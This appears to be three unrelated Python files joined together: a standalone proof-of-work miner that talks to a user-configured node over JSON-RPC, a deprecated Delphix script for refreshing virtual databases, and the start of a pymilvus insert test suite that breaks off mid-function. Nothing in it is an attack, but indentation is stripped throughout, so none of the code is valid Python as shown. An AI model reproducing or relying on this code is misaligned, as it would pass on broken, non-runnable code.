# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class VoxelsRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = VoxelsRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 8332
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
dx_refresh_db.py
|
#!/usr/bin/env python
# DEPRECATED
# Adam Bowen - Apr 2016
# This script refreshes a vdb
# Updated by Corey Brune Oct 2016
# requirements
# pip install --upgrade setuptools pip docopt delphixpy
# The below doc follows the POSIX compliant standards and allows us to use
# this doc to also define our arguments for the script. This thing is brilliant.
"""Refresh a vdb
Usage:
dx_refresh_db.py (--name <name> | --dsource <name> | --all_vdbs [--group_name <name>]| --host <name> | --list_timeflows | --list_snapshots)
[--timestamp_type <type>]
[--timestamp <timepoint_semantic> --timeflow <timeflow>]
[-d <identifier> | --engine <identifier> | --all]
[--debug] [--parallel <n>] [--poll <n>]
[--config <path_to_file>] [--logdir <path_to_file>]
dx_refresh_db.py -h | --help | -v | --version
Refresh a Delphix VDB
Examples:
dx_refresh_db.py --name "aseTest" --group_name "Analytics"
dx_refresh_db.py --dsource "dlpxdb1"
dx_refresh_db.py --all_vdbs --host LINUXSOURCE --parallel 4 --debug -d landsharkengine
dx_refresh_db.py --all_vdbs --group_name "Analytics" --all
Options:
--name <name> Name of the object you are refreshing.
--all_vdbs Refresh all VDBs that meet the filter criteria.
--dsource <name> Name of dsource in Delphix to execute against.
--group_name <name> Name of the group to execute against.
--list_timeflows List all timeflows
--list_snapshots List all snapshots
--host <name> Name of environment in Delphix to execute against.
--timestamp_type <type> The type of timestamp you are specifying.
Acceptable Values: TIME, SNAPSHOT
[default: SNAPSHOT]
--timestamp <timepoint_semantic>
The Delphix semantic for the point in time on
the source from which you want to refresh your VDB.
Formats:
latest point in time or snapshot: LATEST
point in time: "YYYY-MM-DD HH24:MI:SS"
snapshot name: "@YYYY-MM-DDTHH24:MI:SS.ZZZ"
snapshot time from GUI: "YYYY-MM-DD HH24:MI"
[default: LATEST]
--timeflow <name> Name of the timeflow to refresh a VDB
-d <identifier> Identifier of Delphix engine in dxtools.conf.
--engine <type> Alt Identifier of Delphix engine in dxtools.conf.
--all Run against all engines.
--debug Enable debug logging
--parallel <n> Limit number of jobs to maxjob
--poll <n> The number of seconds to wait between job polls
[default: 10]
--config <path_to_file> The path to the dxtools.conf file
[default: ./dxtools.conf]
--logdir <path_to_file> The path to the logfile you want to use.
[default: ./dx_refresh_db.log]
-h --help Show this screen.
-v --version Show version.
"""
from __future__ import print_function
VERSION = "v.0.1.615"
import json
import logging
import sys
import traceback
from os.path import basename
from time import sleep
from time import time
from docopt import docopt
from delphixpy.v1_8_0 import job_context
from delphixpy.v1_8_0.delphix_engine import DelphixEngine
from delphixpy.v1_8_0.exceptions import HttpError
from delphixpy.v1_8_0.exceptions import JobError
from delphixpy.v1_8_0.exceptions import RequestError
from delphixpy.v1_8_0.web import database
from delphixpy.v1_8_0.web import environment
from delphixpy.v1_8_0.web import group
from delphixpy.v1_8_0.web import job
from delphixpy.v1_8_0.web import source
from delphixpy.v1_8_0.web import timeflow
from delphixpy.v1_8_0.web.snapshot import snapshot
from delphixpy.v1_8_0.web.vo import OracleRefreshParameters
from delphixpy.v1_8_0.web.vo import RefreshParameters
from delphixpy.v1_8_0.web.vo import TimeflowPointLocation
from delphixpy.v1_8_0.web.vo import TimeflowPointSemantic
from delphixpy.v1_8_0.web.vo import TimeflowPointTimestamp
from lib.DlpxException import DlpxException
from lib.DxLogging import logging_est
from lib.DxLogging import print_debug
from lib.DxLogging import print_exception
from lib.DxLogging import print_info
from lib.GetReferences import find_obj_by_name
from lib.GetSession import GetSession
def run_async(func):
"""
http://code.activestate.com/recipes/576684-simple-threading-decorator/
run_async(func)
function decorator, intended to make "func" run in a separate
thread (asynchronously).
Returns the created Thread object
E.g.:
@run_async
def task1():
do_something
@run_async
def task2():
do_something_too
t1 = task1()
t2 = task2()
...
t1.join()
t2.join()
"""
from threading import Thread
from functools import wraps
@wraps(func)
def async_func(*args, **kwargs):
func_hl = Thread(target=func, args=args, kwargs=kwargs)
func_hl.start()
return func_hl
return async_func
def find_all_databases_by_dsource_name(
engine, server, dsource_name, exclude_js_container=True
):
"""
Easy way to quickly find databases by dSource
"""
# First search for the dSource name specified and return its reference
dsource_obj = find_obj_by_name(engine, server, database, dsource_name)
if dsource_obj:
return database.get_all(
server,
provision_container=dsource_obj.reference,
no_js_container_data_source=exclude_js_container,
)
def find_all_databases_by_group_name(
engine, server, group_name, exclude_js_container=True
):
"""
Easy way to quickly find databases by group name
"""
# First search groups for the name specified and return its reference
group_obj = find_obj_by_name(engine, server, group, group_name)
if group_obj:
return database.get_all(
server,
group=group_obj.reference,
no_js_container_data_source=exclude_js_container,
)
def find_database_by_name_and_group_name(engine, server, group_name, database_name):
databases = find_all_databases_by_group_name(engine, server, group_name)
for each in databases:
if each.name == database_name:
print_debug(engine["hostname"] + ": Found a match " + str(each.reference))
return each
print_info(
engine["hostname"] + ': Unable to find "' + database_name + '" in ' + group_name
)
def find_snapshot_by_database_and_name(engine, server, database_obj, snap_name):
snapshots = snapshot.get_all(server, database=database_obj.reference)
matches = []
for snapshot_obj in snapshots:
if str(snapshot_obj.name).startswith(arguments["--timestamp"]):
matches.append(snapshot_obj)
if len(matches) == 1:
print_debug(
engine["hostname"] + ": Found one and only one match. This is good."
)
print_debug(engine["hostname"] + ": " + matches[0])
return matches[0]
elif len(matches) > 1:
print_error(
"The name specified was not specific enough. " "More than one match found."
)
for each in matches:
print_debug(engine["hostname"] + ": " + each.name)
else:
print_error("No matches found for the time specified")
print_error("No matching snapshot found")
def find_snapshot_by_database_and_time(engine, server, database_obj, snap_time):
"""
Find snapshot object by database name and timetamp
engine:
server: A Delphix engine object.
database_obj: The database reference to retrieve the snapshot
snap_time: timstamp of the snapshot
"""
snapshots = snapshot.get_all(server, database=database_obj.reference)
matches = []
for snapshot_obj in snapshots:
if (
str(snapshot_obj.latest_change_point.timestamp) == snap_time
or str(snapshot_obj.first_change_point.timestamp) == snap_time
):
matches.append(snapshot_obj)
if len(matches) == 1:
snap_match = get_obj_name(server, database, matches[0].container)
print_debug(
engine["hostname"] + ": Found one and only one match. This is good."
)
print_debug(engine["hostname"] + ": " + snap_match)
return matches[0]
elif len(matches) > 1:
print_debug(engine["hostname"] + ": " + matches)
raise DlpxException(
"The time specified was not specific enough."
" More than one match found.\n"
)
else:
raise DlpxException("No matches found for the time specified.\n")
def find_source_by_database(engine, server, database_obj):
# The source tells us if the database is enabled/disables, virtual,
# vdb/dSource, or is a staging database.
source_obj = source.get_all(server, database=database_obj.reference)
# We'll just do a little sanity check here to ensure we only have a
# 1:1 result.
if len(source_obj) == 0:
print_error(
engine["hostname"]
+ ": Did not find a source for "
+ database_obj.name
+ ". Exiting"
)
sys.exit(1)
elif len(source_obj) > 1:
print_error(
engine["hostname"]
+ ": More than one source returned for "
+ database_obj.name
+ ". Exiting"
)
print_error(source_obj)
sys.exit(1)
return source_obj
def get_config(config_file_path):
"""
This function reads in the dxtools.conf file
"""
# First test to see that the file is there and we can open it
try:
config_file = open(config_file_path).read()
except:
print_error(
"Was unable to open "
+ config_file_path
+ ". Please check the path and permissions, then try again."
)
sys.exit(1)
# Now parse the file contents as json and turn them into a
# python dictionary, throw an error if it isn't proper json
try:
config = json.loads(config_file)
except:
print_error(
"Was unable to read "
+ config_file_path
+ " as json. Please check file in a json formatter and "
"try again."
)
sys.exit(1)
# Create a dictionary of engines (removing the data node from the
# dxtools.json, for easier parsing)
delphix_engines = {}
for each in config["data"]:
delphix_engines[each["hostname"]] = each
print_debug(delphix_engines)
return delphix_engines
def job_mode(server):
"""
This function tells Delphix how to execute jobs, based on the
single_thread variable at the beginning of the file
"""
# Synchronously (one at a time)
if single_thread == True:
job_m = job_context.sync(server)
print_debug("These jobs will be executed synchronously")
# Or asynchronously
else:
job_m = job_context.asyncly(server)
print_debug("These jobs will be executed asynchronously")
return job_m
def job_wait():
"""
This job stops all work in the thread/process until all jobs on the
engine are completed.
"""
# Grab all the jos on the server (the last 25, be default)
all_jobs = job.get_all(server)
# For each job in the list, check to see if it is running (not ended)
for jobobj in all_jobs:
if not (jobobj.job_state in ["CANCELED", "COMPLETED", "FAILED"]):
print_debug(
"Waiting for "
+ jobobj.reference
+ " (currently: "
+ jobobj.job_state
+ ") to finish running against the container"
)
# If so, wait
job_context.wait(server, jobobj.reference)
def get_obj_name(server, f_object, obj_reference):
"""
Return the object name from obj_reference
engine: A Delphix engine object.
obj_reference: The object reference to retrieve the name
"""
try:
obj_name = f_object.get(server, obj_reference)
return obj_name.name
except RequestError as e:
raise dlpxExceptionHandler(e)
except HttpError as e:
raise DlpxException(e)
def list_snapshots(server):
"""
List all snapshots with timestamps
"""
header = "Snapshot Name, First Change Point, Location, Latest Change Point"
snapshots = snapshot.get_all(server)
print(header)
for snap in snapshots:
container_name = get_obj_name(server, database, snap.container)
snap_range = snapshot.timeflow_range(server, snap.reference)
print("{}, {}, {}, {}, {}".format(
str(snap.name),
container_name,
snap_range.start_point.timestamp,
snap_range.start_point.location,
snap_range.end_point.timestamp,
))
@run_async
def main_workflow(engine):
"""
This function is where we create our main workflow.
Use the @run_async decorator to run this function asynchronously.
The @run_async decorator allows us to run against multiple Delphix Engine
simultaneously
"""
# Pull out the values from the dictionary for this engine
engine_address = engine["ip_address"]
engine_username = engine["username"]
engine_password = engine["password"]
# Establish these variables as empty for use later
databases = []
environment_obj = None
source_objs = None
jobs = {}
# Setup the connection to the Delphix Engine
server = serversess(engine_address, engine_username, engine_password)
# If an environment/server was specified
if host_name:
print_debug(engine["hostname"] + ": Getting environment for " + host_name)
# Get the environment object by the hostname
environment_obj = find_obj_by_name(engine, server, environment, host_name)
if environment_obj != None:
# Get all the sources running on the server
env_source_objs = source.get_all(
server, environment=environment_obj.reference
)
# If the server doesn't have any objects, exit.
if env_source_objs == None:
print_error(host_name + "does not have any objects. Exiting")
sys.exit(1)
# If we are only filtering by the server, then put those objects in
# the main list for processing
if not (arguments["--group_name"] and database_name):
source_objs = env_source_objs
all_dbs = database.get_all(server, no_js_container_data_source=True)
databases = []
for source_obj in source_objs:
if source_obj.staging == False and source_obj.virtual == True:
database_obj = database.get(server, source_obj.container)
if database_obj in all_dbs:
databases.append(database_obj)
else:
print_error(
engine["hostname"]
+ ":No environment found for "
+ host_name
+ ". Exiting"
)
sys.exit(1)
# If we specified a specific database by name....
if arguments["--name"]:
# Get the database object from the name
database_obj = find_obj_by_name(engine, server, database, arguments["--name"])
if database_obj:
databases.append(database_obj)
# Else if we specified a group to filter by....
elif arguments["--group_name"]:
print_debug(
engine["hostname"]
+ ":Getting databases in group "
+ arguments["--group_name"]
)
# Get all the database objects in a group.
databases = find_all_databases_by_group_name(
engine, server, arguments["--group_name"]
)
# Else if we specified a dSource to filter by....
elif arguments["--dsource"]:
print_debug(
engine["hostname"]
+ ":Getting databases for dSource"
+ arguments["--dsource"]
)
# Get all the database objects in a group.
databases = find_all_databases_by_dsource_name(
engine, server, arguments["--dsource"]
)
# Else, if we said all vdbs ...
elif arguments["--all_vdbs"] and not arguments["--host"]:
print_debug(engine["hostname"] + ":Getting all VDBs ")
# Grab all databases, but filter out the database that are in JetStream
# containers, because we can't refresh those this way.
databases = database.get_all(server, no_js_container_data_source=True)
elif arguments["--list_timeflows"]:
list_timeflows(server)
elif arguments["--list_snapshots"]:
list_snapshots(server)
# reset the running job count before we begin
i = 0
with job_mode(server):
# While there are still running jobs or databases still to process....
while len(jobs) > 0 or len(databases) > 0:
# While there are databases still to process and we are still under
# the max simultaneous jobs threshold (if specified)
while len(databases) > 0 and (
arguments["--parallel"] == None or i < int(arguments["--parallel"])
):
# Give us the next database in the list, and then remove it
database_obj = databases.pop()
# Get the source of the database.
source_obj = find_source_by_database(engine, server, database_obj)
# If we applied the environment/server filter AND group filter,
# find the intersecting matches
if environment_obj != None and (arguments["--group_name"]):
match = False
for env_source_obj in env_source_objs:
if source_obj[0].reference in env_source_obj.reference:
match = True
break
if match == False:
print_error(
engine["hostname"]
+ ": "
+ database_obj.name
+ " does not exist on "
+ host_name
+ ". Exiting"
)
return
# Refresh the database
refresh_job = refresh_database(
engine, server, jobs, source_obj[0], database_obj
)
# If refresh_job has any value, then we know that a job was
# initiated.
if refresh_job:
# increment the running job count
i += 1
# Check to see if we are running at max parallel processes, and
# report if so.
if arguments["--parallel"] != None and i >= int(arguments["--parallel"]):
print_info(engine["hostname"] + ": Max jobs reached (" + str(i) + ")")
i = update_jobs_dictionary(engine, server, jobs)
print_info(
engine["hostname"]
+ ": "
+ str(i)
+ " jobs running. "
+ str(len(databases))
+ " jobs waiting to run"
)
# If we have running jobs, pause before repeating the checks.
if len(jobs) > 0:
sleep(float(arguments["--poll"]))
def print_error(print_obj):
"""
Call this function with a log message to prefix the message with ERROR
"""
print("ERROR: " + str(print_obj))
logging.error(str(print_obj))
def print_warning(print_obj):
"""
Call this function with a log message to prefix the message with WARNING
"""
print("WARNING: " + str(print_obj))
logging.warning(str(print_obj))
def refresh_database(engine, server, jobs, source_obj, container_obj):
"""
This function actually performs the refresh
engine:
server: Engine object
jobs: list containing running jobs
source_obj: source object used to refresh from snapshot or timeflow
container_obj: VDB container
"""
# Sanity check to make sure our source object has a reference
if source_obj.reference:
# We can only refresh VDB's
if source_obj.virtual != True:
print_warning(
engine["hostname"]
+ ": "
+ container_obj.name
+ " is not a virtual object. Skipping."
)
# Ensure this source is not a staging database. We can't act upon those.
elif source_obj.staging == True:
print_warning(
engine["hostname"]
+ ": "
+ container_obj.name
+ " is a staging database. Skipping."
)
# Ensure the source is enabled. We can't refresh disabled databases.
elif source_obj.runtime.enabled == "ENABLED":
source_db = database.get(server, container_obj.provision_container)
if not source_db:
print_error(
engine["hostname"]
+ ":Was unable to retrieve the source container for "
+ container_obj.name
)
print_info(
engine["hostname"]
+ ": Refreshing "
+ container_obj.name
+ " from "
+ source_db.name
)
print_debug(engine["hostname"] + ": Type: " + source_obj.type)
print_debug(engine["hostname"] + ":" + source_obj.type)
# If the vdb is a Oracle type, we need to use a
# OracleRefreshParameters
if str(container_obj.reference).startswith("ORACLE"):
refresh_params = OracleRefreshParameters()
else:
refresh_params = RefreshParameters()
try:
refresh_params.timeflow_point_parameters = set_timeflow_point(
engine, server, source_db
)
print_debug(engine["hostname"] + ":" + str(refresh_params))
# Sync it
database.refresh(server, container_obj.reference, refresh_params)
jobs[container_obj] = server.last_job
except RequestError as e:
print("\nERROR: Could not set timeflow point:\n%s\n" % (
e.message.action
))
sys.exit(1)
except DlpxException as e:
print("ERROR: Could not set timeflow point:\n%s\n" % (e.message))
sys.exit(1)
# return the job object to the calling statement so that we can
# tell if a job was created or not (will return None, if no job)
return server.last_job
# Don't do anything if the database is disabled
else:
print_warning(
engine["hostname"]
+ ": "
+ container_obj.name
+ " is not enabled. Skipping sync"
)
def run_job(engine):
"""
This function runs the main_workflow aynchronously against all the
servers specified
"""
# Create an empty list to store threads we create.
threads = []
# If the --all argument was given, run against every engine in dxtools.conf
if arguments["--all"]:
print_info("Executing against all Delphix Engines in the dxtools.conf")
# For each server in the dxtools.conf...
for delphix_engine in dxtools_objects:
engine = dxtools_objects[delphix_engine]
# Create a new thread and add it to the list.
threads.append(main_workflow(engine))
else:
# Else if the --engine argument was given, test to see if the engine
# exists in dxtools.conf
if arguments["--engine"]:
try:
engine = dxtools_objects[arguments["--engine"]]
print_info("Executing against Delphix Engine: " + arguments["--engine"])
except:
print_error(
'Delphix Engine "{}" cannot be found in "{}"'.format(
arguments["--engine"],
config_file_path,
)
)
print_error("Please check your value and try again. Exiting")
sys.exit(1)
# Else if the -d argument was given, test to see if the engine exists
# in dxtools.conf
elif arguments["-d"]:
try:
engine = dxtools_objects[arguments["-d"]]
print_info("Executing against Delphix Engine: " + arguments["-d"])
except:
print_error(
'Delphix Engine "'
+ arguments["-d"]
+ '" cannot be found in '
+ config_file_path
)
print_error("Please check your value and try again. Exiting")
sys.exit(1)
else:
# Else search for a default engine in the dxtools.conf
for delphix_engine in dxtools_objects:
if dxtools_objects[delphix_engine]["default"] == "true":
engine = dxtools_objects[delphix_engine]
print_info(
"Executing against the default Delphix Engine"
" in the dxtools.conf: "
+ dxtools_objects[delphix_engine]["hostname"]
)
break
if engine == None:
print_error("No default engine found. Exiting")
sys.exit(1)
# run the job against the engine
threads.append(main_workflow(engine))
# For each thread in the list...
for each in threads:
# join them back together so that we wait for all threads to complete
# before moving on
each.join()
def serversess(f_engine_address, f_engine_username, f_engine_password):
"""
Function to setup the session with the Delphix Engine
"""
server_session = DelphixEngine(
f_engine_address, f_engine_username, f_engine_password, "DOMAIN"
)
return server_session
def list_timeflows(server):
"""
Retrieve and print all timeflows for a given engine
"""
ret_timeflow_dct = {}
all_timeflows = timeflow.get_all(server)
print("DB Name, Timeflow Name, Timestamp")
for tfbm_lst in all_timeflows:
try:
db_name = get_obj_name(server, database, tfbm_lst.container)
print("%s, %s, %s\n" % (
str(db_name),
str(tfbm_lst.name),
str(tfbm_lst.parent_point.timestamp),
))
except AttributeError:
print("%s, %s\n" % (str(tfbm_lst.name), str(db_name)))
except TypeError as e:
raise DlpxException(
"Listing Timeflows encountered an error:\n%s" % (e.message)
)
except RequestError as e:
dlpx_err = e.message
raise DlpxException(dlpx_err.action)
def set_timeflow_point(engine, server, container_obj):
"""
This returns the reference of the timestamp specified.
engine:
server: Delphix Engine object
container_obj: VDB object
"""
if arguments["--timestamp_type"].upper() == "SNAPSHOT":
if arguments["--timestamp"].upper() == "LATEST":
print_debug(engine["hostname"] + ": Using the latest Snapshot")
timeflow_point_parameters = TimeflowPointSemantic()
timeflow_point_parameters.location = "LATEST_SNAPSHOT"
elif arguments["--timestamp"].startswith("@"):
print_debug(engine["hostname"] + ": Using a named snapshot")
snapshot_obj = find_snapshot_by_database_and_name(
engine, server, container_obj, arguments["--timestamp"]
)
if snapshot_obj:
timeflow_point_parameters = TimeflowPointLocation()
timeflow_point_parameters.timeflow = snapshot_obj.timeflow
timeflow_point_parameters.location = (
snapshot_obj.latest_change_point.location
)
else:
raise DlpxException(
"ERROR: Was unable to use the specified "
"snapshot %s for database %s.\n"
% (arguments["--timestamp"], container_obj.name)
)
elif arguments["--timestamp"]:
print_debug(engine["hostname"] + ": Using a time-designated snapshot")
snapshot_obj = find_snapshot_by_database_and_time(
engine, server, container_obj, arguments["--timestamp"]
)
if snapshot_obj:
timeflow_point_parameters = TimeflowPointTimestamp()
timeflow_point_parameters.timeflow = snapshot_obj.timeflow
timeflow_point_parameters.timestamp = (
snapshot_obj.latest_change_point.timestamp
)
else:
raise DlpxException(
"Was unable to find a suitable time"
" for %s for database %s"
% (arguments["--timestamp"], container_obj.name)
)
elif arguments["--timestamp_type"].upper() == "TIME":
if arguments["--timestamp"].upper() == "LATEST":
timeflow_point_parameters = TimeflowPointSemantic()
timeflow_point_parameters.location = "LATEST_POINT"
elif arguments["--timestamp"]:
timeflow_point_parameters = TimeflowPointTimestamp()
timeflow_point_parameters.type = "TimeflowPointTimestamp"
timeflow_obj = find_obj_by_name(
engine, server, timeflow, arguments["--timeflow"]
)
timeflow_point_parameters.timeflow = timeflow_obj.reference
timeflow_point_parameters.timestamp = arguments["--timestamp"]
return timeflow_point_parameters
else:
raise DlpxException(
arguments["--timestamp_type"] + " is not a valied timestamp_type. Exiting"
)
timeflow_point_parameters.container = container_obj.reference
return timeflow_point_parameters
def time_elapsed():
"""
This function calculates the time elapsed since the beginning of the script.
Call this anywhere you want to note the progress in terms of time
"""
elapsed_minutes = round((time() - time_start) / 60, +1)
return elapsed_minutes
def update_jobs_dictionary(engine, server, jobs):
"""
This function checks each job in the dictionary and updates its status or
removes it if the job is complete.
Return the number of jobs still running.
"""
# Establish the running jobs counter, as we are about to update the count
# from the jobs report.
i = 0
# get all the jobs, then inspect them
for j in jobs.keys():
job_obj = job.get(server, jobs[j])
print_debug(engine["hostname"] + ": " + str(job_obj))
print_info(engine["hostname"] + ": " + j.name + ": " + job_obj.job_state)
if job_obj.job_state in ["CANCELED", "COMPLETED", "FAILED"]:
# If the job is in a non-running state, remove it from the running
# jobs list.
del jobs[j]
else:
# If the job is in a running state, increment the running job count.
i += 1
return i
def main(argv):
# We want to be able to call on these variables anywhere in the script.
global single_thread
global usebackup
global time_start
global host_name
global database_name
global config_file_path
global dxtools_objects
try:
# Declare globals that will be used throughout the script.
logging_est(arguments["--logdir"])
print_debug(arguments)
time_start = time()
engine = None
single_thread = False
database_name = arguments["--name"]
host_name = arguments["--host"]
config_file_path = arguments["--config"]
# Parse the dxtools.conf and put it into a dictionary
dxtools_objects = get_config(config_file_path)
# This is the function that will handle processing main_workflow for
# all the servers.
run_job(engine)
elapsed_minutes = time_elapsed()
print_info("script took " + str(elapsed_minutes) + " minutes to get this far.")
# Here we handle what we do when the unexpected happens
except SystemExit as e:
"""
This is what we use to handle our sys.exit(#)
"""
sys.exit(e)
except HttpError as e:
"""
We use this exception handler when our connection to Delphix fails
"""
print_error("Connection failed to the Delphix Engine")
print_error("Please check the ERROR message below")
print_error(e.message)
sys.exit(2)
except JobError as e:
"""
We use this exception handler when a job fails in Delphix so that we
have actionable data
"""
print_error("A job failed in the Delphix Engine")
print_error(e.job)
elapsed_minutes = time_elapsed()
print_info(
basename(__file__)
+ " took "
+ str(elapsed_minutes)
+ " minutes to get this far."
)
sys.exit(3)
except KeyboardInterrupt:
"""
We use this exception handler to gracefully handle ctrl+c exits
"""
print_debug("You sent a CTRL+C to interrupt the process")
elapsed_minutes = time_elapsed()
print_info(
basename(__file__)
+ " took "
+ str(elapsed_minutes)
+ " minutes to get this far."
)
except:
"""
Everything else gets caught here
"""
print_error(sys.exc_info()[0])
print_error(traceback.format_exc())
elapsed_minutes = time_elapsed()
print_info(
basename(__file__)
+ " took "
+ str(elapsed_minutes)
+ " minutes to get this far."
)
sys.exit(1)
if __name__ == "__main__":
# Grab our arguments from the doc at the top of the script
print("THIS SCRIPT IS DEPRECATED. USE dx_refresh_vdb.py, instead")
sys.exit(1)
arguments = docopt(__doc__, version=basename(__file__) + " " + VERSION)
# Feed our arguments to the main function, and off we go!
main(arguments)
|
test_insert_20.py
|
import threading
import numpy as np
import pandas as pd
import pytest
from pymilvus import Index
from base.client_base import TestcaseBase
from utils.util_log import test_log as log
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
prefix = "insert"
exp_name = "name"
exp_schema = "schema"
exp_num = "num_entities"
exp_primary = "primary"
default_schema = cf.gen_default_collection_schema()
default_binary_schema = cf.gen_default_binary_collection_schema()
default_index_params = {"index_type": "IVF_SQ8", "metric_type": "L2", "params": {"nlist": 64}}
default_binary_index_params = {"index_type": "BIN_IVF_FLAT", "metric_type": "JACCARD", "params": {"nlist": 64}}
class TestInsertParams(TestcaseBase):
""" Test case of Insert interface """
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_non_data_type(self, request):
if isinstance(request.param, list) or request.param is None:
pytest.skip("list and None type is valid data type")
yield request.param
@pytest.fixture(scope="module", params=ct.get_invalid_strs)
def get_invalid_field_name(self, request):
if isinstance(request.param, (list, dict)):
pytest.skip()
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_insert_dataframe_data(self):
"""
target: test insert DataFrame data
method: 1.create 2.insert dataframe data
expected: assert num entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
df = cf.gen_default_dataframe_data(ct.default_nb)
mutation_res, _ = collection_w.insert(data=df)
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_list_data(self):
"""
target: test insert list-like data
method: 1.create 2.insert list data
expected: assert num entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(ct.default_nb)
mutation_res, _ = collection_w.insert(data=data)
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == data[0]
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_non_data_type(self, get_non_data_type):
"""
target: test insert with non-dataframe, non-list data
method: insert with data (non-dataframe and non-list type)
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
